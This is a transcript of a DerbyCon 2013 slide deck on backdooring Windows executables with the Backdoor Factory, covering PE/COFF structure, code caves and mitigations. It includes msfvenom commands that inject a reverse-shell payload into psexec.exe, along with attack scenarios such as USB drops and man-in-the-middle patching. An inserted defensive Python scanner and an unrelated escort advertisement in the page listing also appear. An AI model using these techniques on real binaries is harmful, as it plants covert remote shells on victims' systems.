Patching Windows Executables
with the Backdoor Factory
Joshua Pitts
DerbyCon 2013
Other Potential Titles
• I’M DOWN WITH APT (yeah you know me)
• Lassie, did Timmy fall in a Code Cave again??
• Why I Cyber and How You Can Cyber too
• When ET met EMET (A Love Story)
• Hugging Your Way to the Top, One Hug at a Time
• How I Owned Your Mother
About Me
• US Marine, Pre-911: SIGINT
• Past: IT and Physical Security Auditor,
Operational Security Lead, Malware and
Forensic Analyst
• Current: Reverse Engineer, Pentester
• Python, C/C++, ASM (INTEL)
• I have certs.. Serious inquiries only :P
• Currently work at Leviathan Security Group
Urban Dictionary
Overview
• History of Patching
• How I learned to patch binaries
• The Backdoor Factory
– Features
– Capabilities
• Demos (Live and Video)
• Mitigations
• Going forward
What is Patching
Definition (Wikipedia):
A patch is a piece of software designed to fix problems with, or update a computer program or its supporting data. This includes fixing security vulnerabilities and other bugs, and improving the usability or performance.
For This Presentation
My Definition:
Adding or taking away content or functionality to a compiled binary.
Security Pros and Patching
• Red Teaming
– persistence in plain sight
• Pentesting/Social Engineering
– Salt all the parking lots!
• Research
– Just because :D
• Malware/Code analysis
– Break the anti-analysis code
History of Patching
Good thing we don’t do this with operating systems.
The MS Method
• MSP – Windows install patch file.
• Contains at least two data transforms
– One updates the install database
– One has info that the installer uses for ‘patching files’
• The installer will then use this info to apply the patch from the cabinet file
• Yada Yada Yada…
What does this mean?
The MS definition of patching is replacing old registry entries, DLLs, and EXEs with new items.
Not the patching that we’re talking about today.
How Key Gens/Crackers do it
• Find the code branch(es) that validate(s) the software’s protection mechanism(s)
• Make it return a value that meets a valid condition for approved/continued operation
• Sometimes it’s a function that returns a True/False (0/1) value after the check.
How Metasploit Patches
• msfvenom -p windows/shell_reverse_tcp -x psexec.exe … The overwrite program entry method
• msfvenom -p windows/shell_reverse_tcp -x psexec.exe -k … The allocate-and-create-thread and return to original program entry method (Keep)
MSF Overwrite program Entry - Before
MSF Overwrite program Entry - After
Pros/Cons
• PRO: Attacker receives a shell (or 17) :D
• PRO: Size of EXE not changed
• CON: No continued execution of program
– WIN - LOSE
MSF Create Thread Method (Keep)
When debugging in Immunity Debugger
MSF Create Thread Method (Keep)
Immunity is telling the truth, memory sections:
Original memory sections:
Msfvenom x32 Keep Method
Explained
• Two separate functions or stubs
• Part Two: The shellcode payloads that we all know
• Part One: Is not new, not so well known, but is awesome
• Looks like an un-named section of code that has RWE attributes (very suspicious)
• Very important for stager payloads
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Pros And Cons of the Msfvenom Keep
Method
• PRO: Attacker receives shell and the binary works ‘normally’ for the user
– That’s a WIN-WIN
• CON: Should be easy for AV to catch
• CON: Size of binary has increased
MSFVenom Win64 Patching Support
Only supports x32
– Submitted a bug post on security street
– A feature request was submitted (#8383):
PE/COFF
The Portable Executable Format
MS-DOS 2.0 header and unused space
OEM ID/INFO
Offset to PE header
MS-DOS 2.0 stub and reloc table, and unused space
PE header
Section headers
Image pages (import/export info, base reloc info, resource info)
• Not much has changed in the last 20 or so years
• Must be backwards compatible (win8 must read the header)
• Easy to automatically manipulate
• http://msdn.microsoft.com/library/windows/hardware/gg463125
The Common Object File Format
(COFF) Format
Microsoft COFF header (machine type, number of sections, etc..)
Section headers
Raw data: code, data, debug info, relocations
• This is included in the PE File Format
• The most important section for RE
• Includes:
- Machine Type
- Number of Sections
- Size and Access (RWE) of Sections
• Typically includes the rest of the file: Code, Data, Debug, Reloc (the actual sections)
End of PE/COFF
How I learned to Backdoor Windows
Binaries
• Through the Offensive Security Cracking the Perimeter (CTP) course
– Duh
• Manual labor
• Time consuming
– At first, hours
– Now about 10-15 minutes
• Missing some important concepts:
– Working with the import table
– Working with staged payloads (stagers)
– Multi cave jumping
– win32 only (slight differences in x64 asm)
CTP Methods
• Append a new section of code
– Similar to the Metasploit msfvenom keep
– Named RWX section (e.g. .sdata, .moo, .what, etc…)
• Use existing code caves for encoding/decoding shellcode in the appended section
– We looked at XOR encoding
– XOR encoding is no longer effective against AV
CTP Method
Code Caves?
Code Caves?
A code cave is an area of bytes in a binary that contains a null byte pattern (x00) greater than two bytes.
How are code caves created?
• Not sure, so I did some research…
• Or went on a quest…
How are code caves created?
• Starting out, I assumed that a unicorn would
know everything.
• So I went to defcon.
• And what’s better than a unicorn at
DEFCON!!!
How are code caves created?
Hi Unicorn!
Hi.. err, human!
How are code caves made?
I don’t know.
Aww. Want a beer?
Pssst… Check compilers…
o/
How are code caves created?
Tested the following x32 compilers:
• G++ - GNU C++
• Cl.exe – MS compiler linker.
• Lcc-win32
• Mingw32-c++
How are code caves created?
Against this code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
/* zero-initialised global array; where the compiler/linker places it decides whether it shows up as a cave */
int array[600] = {0};
int main(int argc, char **argv)
{
    printf("hello world");
    return 0;
}
This Code is FREE as in BEER.
Find Code Caves Demo
Code: http://github.com/secretsquirrel/the-backdoor-factory
Binaries: http://live.sysinternals.com
How Are Code Caves Created?
Results for code caves greater than 200 bytes in named sections (e.g. .text, .data, .idata, etc…):
• Cl.exe : 7
• G++: 4
• Mingw32-c++: 3
• Lcc-win32: 0
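As an added defender-side example (not code from the talk or from the Backdoor Factory project), the following Python walks the PE/COFF headers described earlier, scans each section’s raw data for null-byte runs using the talk’s cave definition and its 200-byte survey threshold, and flags sections that are both writable and executable or unnamed, the pattern the msfvenom keep slide calls very suspicious. The PE image it scans is constructed inline for the demonstration; its section names, contents and offsets are made up, not taken from any real compiler output.

```python
import re
import struct

# PE/COFF constants from the Microsoft PE/COFF specification
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
MACHINE_NAMES = {IMAGE_FILE_MACHINE_I386: "win32", IMAGE_FILE_MACHINE_AMD64: "win64"}


def parse_pe(data):
    """MZ header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsects, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsects):
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "raw_ptr": raw_ptr,
                         "raw_size": raw_size, "flags": flags})
    return {"machine": MACHINE_NAMES.get(machine, "unsupported"), "sections": sections}


def find_caves(data, sections, min_len=3):
    """Runs of 0x00 of at least min_len bytes inside each section's raw data.
    The talk's definition is 'more than two bytes'; its compiler survey used 200."""
    pattern = re.compile(rb"\x00{%d,}" % min_len)
    caves = []
    for s in sections:
        raw = data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        for m in pattern.finditer(raw):
            caves.append({"section": s["name"], "file_offset": s["raw_ptr"] + m.start(),
                          "length": m.end() - m.start()})
    return caves


def suspicious_sections(sections):
    """Triage checks: a section that is both writable and executable (the appended
    RWX-section pattern), or one with an empty name."""
    findings = []
    for s in sections:
        label = s["name"] or "<unnamed>"
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append((label, "writable+executable"))
        if not s["name"]:
            findings.append((label, "empty section name"))
    return findings


def build_sample_pe():
    """Constructed minimal PE32 image (not real compiler output): three sections on
    0x200-byte file alignment; slack is zero-filled like linker padding, which is
    one place caves come from."""
    align = 0x200
    opt_size = 0xE0                       # PE32 optional header size
    spec = [  # (name, characteristics, raw content) -- all made up
        (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
         b"\x55\x8b\xec" * 20 + b"\x00" * 300 + b"\xc3" * 20),
        (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
         b"hello world\0" + b"\x00" * 16 + b"A" * 8),
        (b"", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
         | IMAGE_SCN_MEM_WRITE, b"\x90" * 64),
    ]
    hdr_len = 0x40 + 4 + 20 + opt_size + 40 * len(spec)
    raw_ptr = -(-hdr_len // align) * align
    table, body, vaddr = b"", b"", 0x1000
    for name, flags, content in spec:
        raw_size = -(-len(content) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(content), vaddr,
                             raw_size, raw_ptr, 0, 0, 0, 0, flags)
        body += content.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += 0x1000
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE signature at 0x40
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(spec), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)    # AddressOfEntryPoint -> .text
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return headers.ljust(-(-len(headers) // align) * align, b"\0") + body


if __name__ == "__main__":
    blob = build_sample_pe()
    info = parse_pe(blob)
    print("machine:", info["machine"])
    for c in find_caves(blob, info["sections"], min_len=200):
        print("cave %4d bytes at 0x%04x in %r" % (c["length"], c["file_offset"], c["section"]))
    for name, why in suspicious_sections(info["sections"]):
        print("suspicious:", name, why)
```

Point parse_pe at a real file’s bytes to reproduce the talk’s survey on your own compiler output; the unnamed RWX finding is the header-level signal a defender can alert on without any signature.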
How Are Code Caves Created?
• Remember this line of code:
– int array[600] = {0};
• Not one had a cave of at least 600 bytes.
How Are Code Caves Created?
Lesson:
If you want to minimize code caves in your code, carefully pick your compiler.**
**More research could be done in this area.***
***I don’t write compilers****
****Nor do I want to…
…yet :P
Some Ideas
• Automation
• Split shellcode into smaller sections
• Use multiple code caves
• Non-sequential cave jumping
• Use user provided shellcode
• Combine the Metasploit Stager solution with the CTP code cave use
Solution: BDF
• x32 version released in March 2013
– Supported only single cave jumping
– No x32 stager support
• Python27 - Single Script
• Supports win32/64
– Supports x32 stagers
– No stager payloads for x64 yet. (Remember that bug/feature request?)
• Code Cave injection (single and multiple)
• Support user-provided shellcode
• Some Randomization (different hash every time an EXE is created)
– Through random one’s complement in the code
– And different types of nops
• Injector Module
How BDF works
• Enumerates PE/COFF Header format
• Determines if binary is supported (win32/64 intel)
• Locates code caves that correspond to size of shellcode
• Patches executable in an attempt to return registers/flags to the original state for continued execution
– Patches entry location with a JMP to the first selected code cave/appended section
– Patches each user selected code cave
How BDF works
• Very primitive disassembler to do just what we need
• Reworked the x32 msfvenom stager ‘keep’ stub to work in code caves and with user provided shellcode
– x64 stager support is in the works
• Reworked a handful of useful metasploit payloads to allow for multiple code cave jumping
Original Way BDF Worked
Now You Can Do This
Or This
Demos
• Support Check (Live)
• Backdooring win32/64 binaries (Live)
– Append code cave
– Single code caving
– Code Cave jumping
• Mass backdooring (directory) - Live
• Provide your own shellcode - Live
• Prototyping shellcode (video)
• The injector module (video)
DEMO – Support Check
• If not supported, then what?
• Email me with the disassembly of the entry function (from a legitimate email)
• I’ll send you the opcode update
DEMO - Patch a file with shellcode
win32/64
• Append
• Pick a single Cave
• Multi-Jumps
• Note – Non-stager payloads will ‘hang’ if C2 is not available
– Payloads are patched ‘in-line’ and not run in a separate thread
DEMO - Mass backdooring (directory)
DEMO - Prototyping shellcode
DEMO – Injector Module
• Injector is the hunt and backdoor binary of doom.
• Use responsibly
DEMO - Provide your own shellcode
• Can be anything, just make sure it matches the process type (x32 for x32)
• Make sure you use ExitFunction=Thread or you will kill the parent process (not good)
Attack Scenarios or Methods
• Salting Parking Lots with USBs
• Hosting Rogue Exes
• Attacking system services
• Linux Setuid Attack for Windows
– Patching binaries that require elevated perms but might be in non-admin directories
• Sysinternal tools
• Setup files
Mitigations
• UPX encoding
• Self Validation
• AVs
• EMET 4.0+
• Hash verification
• White Listing
Mitigations - UPX Encoding
• Not supported by BDF
• Unpack – Patch – Pack
• UPX is not protection against patching
• Could open your Exe up to potential weaknesses
– Are you unpacking to unprotected memory space?
Mitigations - Self Validation
• Team Viewer
• Round Robin Checking
• Find the check, patch it
Mitigations – Anti-Virus’
• I broke the “rule” and uploaded my samples to Virustotal for this presentation
• It really doesn’t matter
• AV is dead
MSFVENOM keep vs MSFVENOM non-keep vs BDF Cave Jumping
MSFVENOM -k -t exe
Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
MSFVENOM keep vs MSFVENOM non-keep vs BDF Cave Jumping
MSFVENOM -t exe
Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
MSFVENOM keep vs MSFVENOM non-keep vs BDF Cave Jumping
BDF Cave jumping
Hash: 5620ba8c64ff0d9cde65eda4156fbb85186f2bd0f16636cded5c9a0d8024d4e9
win32 BDF vs win64 BDF
ZoomIt.exe vs ZoomIt64.exe
EMET 4.0+ FTW?
• If you use position-independent shellcode (metasploit)
• And the target binary is protected by EMET…
• And the Caller protection setting is enabled…
• And the application is running as win32…
• EMET will stop this type of attack!
EMET 4.0+ FTW?
• If the binary executes as a win64 process
• EMET will not stop this type of attack!
From the EMET 4.0 User Guide:
Mitigations - Whitelisting
• Based on what you’ve seen today, why would you trust AV?
• There are whitelisting vendors; I’m not endorsing any of them
• I did not test it, but they “should” work – if based on hash verification and not name
• Not the end game solution (e.g. powershell memory injection)
Enterprise Mitigations
• Don’t let end users download binaries
• Verify Your Binaries before Deploying
– Verify hashes
– Conduct forensic analysis and testing
– Look at network traffic
– Etc…
Road Map
• x64 stub to support staged payloads
• Support Mach-O and ELF formats
• Patch the IAT and api pointers to shorten required shellcode and eliminate ROP-like calls
• MITM patching of binaries during download
Progress on x64 Stager
Questions?

Vulnerability, exploit to metasploit
 

Recently uploaded

UX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business GoalsUX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business Goals
FIDO Alliance
 
The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
Razin Mustafiz
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
David Wilson
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
Zilliz
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Zilliz
 
NVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space ExplorationNVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space Exploration
Alison B. Lowndes
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
Jimmy Lai
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
alexjohnson7307
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
Zilliz
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
janagijoythi
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
FIDO Alliance
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
SAI KAILASH R
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Nicolás Lopéz
 
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
AimanAthambawa1
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
SubhamMandal40
 

Recently uploaded (20)

UX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business GoalsUX Webinar Series: Aligning Authentication Experiences with Business Goals
UX Webinar Series: Aligning Authentication Experiences with Business Goals
 
The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
 
NVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space ExplorationNVIDIA at Breakthrough Discuss for Space Exploration
NVIDIA at Breakthrough Discuss for Space Exploration
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
 
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
 

Patching Windows Executables with the Backdoor Factory | DerbyCon 2013

  • 1. Patching Windows Executables with the Backdoor Factory Joshua Pitts DerbyCon 2013
  • 2. Other Potential Titles • I’M DOWN WITH APT (yeah you know me) • Lassie, did Timmy fall in a Code Cave again?? • Why I Cyber and How You Can Cyber too • When ET met EMET (A Love Story) • Hugging Your Way to the Top, One Hug at a Time • How I Owned Your Mother
  • 3. About Me • US Marine, Pre-911: SIGINT • Past: IT and Physical Security Auditor, Operational Security Lead, Malware and Forensic Analyst • Current: Reverse Engineer, Pentester • Python, C/C++, ASM (INTEL) • I have certs.. Serious inquiries only :P • Currently work at Leviathan Security Group
  • 5. Overview • History of Patching • How I learned to patch binaries • The Backdoor Factory – Features – Capabilities • Demos (Live and Video) • Mitigations • Going forward
  • 6. What is Patching Definition (Wikipedia): A patch is a piece of software designed to fix problems with, or update a computer program or its supporting data. This includes fixing security vulnerabilities and other bugs, and improving the usability or performance.
  • 7. For This Presentation My Definition: Adding or taking away content or functionality to a compiled binary.
  • 8. Security Pros and Patching • Red Teaming – persistence in plain sight • Pentesting/Social Engineering – Salt all the parking lots! • Research – Just because :D • Malware/Code analysis – Break the anti-analysis code
  • 9. History of Patching Good thing we don’t do this with operating systems.
  • 10. The MS Method • MSP – Windows install patch file. • Contains at least two data transforms – One updates the install database – One has info that the installer uses for ‘patching files’ • The installer will then use this info to apply the patch from the cabinet file • Yada Yada Yada…
  • 11. What does this mean? The MS definition of patching is replacing old registry entries, DLLs, and EXEs with new items. Not the patching that we’re talking about today.
  • 12. How Key Gens/Crackers do it • Find code branch(es) that validate(s) the software’s protection mechanism(s) • Make it return a value that meets a valid condition for approved/continued operation • Sometimes it’s a function that returns a True/False (0/1) value after the check.
  • 13. How Metasploit Patches • msfvenom -p windows/shell_reverse_tcp -x psexec.exe … The overwrite program entry method • msfvenom -p windows/shell_reverse_tcp -x psexec.exe -k … The allocate, create thread and return to original program entry method (Keep)
  • 14. MSF Overwrite program Entry - Before
  • 15. MSF Overwrite program Entry - After
  • 16. Pros/Cons • PRO: Attacker receives a shell (or 17) :D • PRO: Size of EXE not changed • CON: No continued execution of program – WIN - LOSE
  • 17. MSF Create Thread Method (Keep) When debugging in Immunity Debugger
  • 18. MSF Create Thread Method (Keep) Immunity is telling the truth, memory sections: Original memory sections:
  • 19. Msfvenom x32 Keep Method Explained • Two separate functions or stubs • Part Two: The shellcode payloads that we all know • Part One: Is not new, not so well known, but is awesome • Looks like an un-named section of code that has RWE attributes (very suspicious) • Very important for stager payloads
  • 21. Pros And Cons of the Msfvenom Keep Method • PRO: Attacker receives shell and the binary works ‘normally’ for the user – That’s a WIN-WIN • CON: Should be easy for AV to catch • CON: Size of binary has increased
  • 22. MSFVenom Win64 Patching Support Only supports x32 – Submitted a bug post on security street – A feature request was submitted (#8383):
  • 24. The Portable Executable Format [diagram: MS-DOS 2.0 header and unused space; OEM ID/INFO; offset to PE header; MS-DOS 2.0 stub, reloc table and unused space; PE header; section headers; import pages (import/export info, base reloc info, resource info)] • Not much has changed in the last 20 or so years • Must be backwards compatible (Win8 must still read the header) • Easy to automatically manipulate • http://msdn.microsoft.com/library/windows/hardware/gg463125
  • 25. The Common Object File Format (COFF) [diagram: Microsoft COFF header (machine type, number of sections, etc.); section headers; raw data: code, data, debug info, relocations] • This is included in the PE file format • The most important section for RE • Includes: – Machine type – Number of sections – Size and access (RWE) of sections • Typically includes the rest of the file: code, data, debug, reloc (the actual sections)
  • 27. How I learned to Backdoor Windows Binaries • Through the Offensive Security Cracking the Perimeter course – Duh • Manual Labor • Time Consuming – At first hours – Now about 10-15 minutes • Missing some important concepts: – Working with the import table – Working with staged payloads (stagers) – Multi cave jumping – win32 only (slight differences in x64 asm)
  • 28. CTP Methods • Append a new section of code – Similar to the Metasploit msfvenom keep – Named RWX section (e.g. .sdata, .moo, .what, etc…) • Use existing code caves for encoding/decoding shellcode in the appended section – We looked at XOR encoding – XOR encoding is no longer effective against AV
  • 31. Code Caves? A code cave is an area of bytes in a binary that contains a null byte pattern (x00) greater than two bytes.
  • 32. How are code caves created? • Not sure, so I did some research… • Or went on a quest…
  • 33. How are code caves created? • Starting out, I assumed that a unicorn would know everything. • So I went to defcon. • And what’s better than a unicorn at DEFCON!!!
  • 34. How are code caves created? Hi Unicorn! Hi.. err, human! How are code caves made? I don’t know.  Aww. Want a beer?  Pssst… Check compilers… o/
  • 35. How are code caves created? Tested the following x32 compilers: • G++ - GNU C++ • Cl.exe – MS compiler linker. • Lcc-win32 • Mingw32-c++
  • 36. How are code caves created? Against this code:
        #include <stdio.h>
        #include <string.h>
        #include <stdlib.h>
        #include <windows.h>

        int array[600] = {0};

        int main(int argc, char **argv) {
            printf("hello world");
            return 0;
        }
    This Code is FREE as in BEER.
  • 37. Find Code Caves Demo Code: http://github.com/secretsquirrel/the-backdoor-factory Binaries: http://live.sysinternals.com
  • 38. How Are Code Caves Created? Results for code caves greater than 200 bytes in named sections (e.g. .text, .data, .idata, etc…): • Cl.exe : 7 • G++: 4 • Mingw32-c++: 3 • Lcc-win32: 0
  • 39. How Are Code Caves Created? • Remember this line of code: – int array[600] = {0}; • Not one had a cave of at least 600 bytes.
  • 40. How Are Code Caves Created? Lesson: If you want to minimize code caves in your code, carefully pick your compiler.** **More research could be done in this area.*** ***I don’t write compilers**** ****Nor do I want to… …yet :P
  • 42. Some Ideas • Automation • Split shellcode into smaller sections • Use multiple code caves • Non-sequential cave jumping • Use user provided shellcode • Combine the Metasploit Stager solution with the CTP code cave use
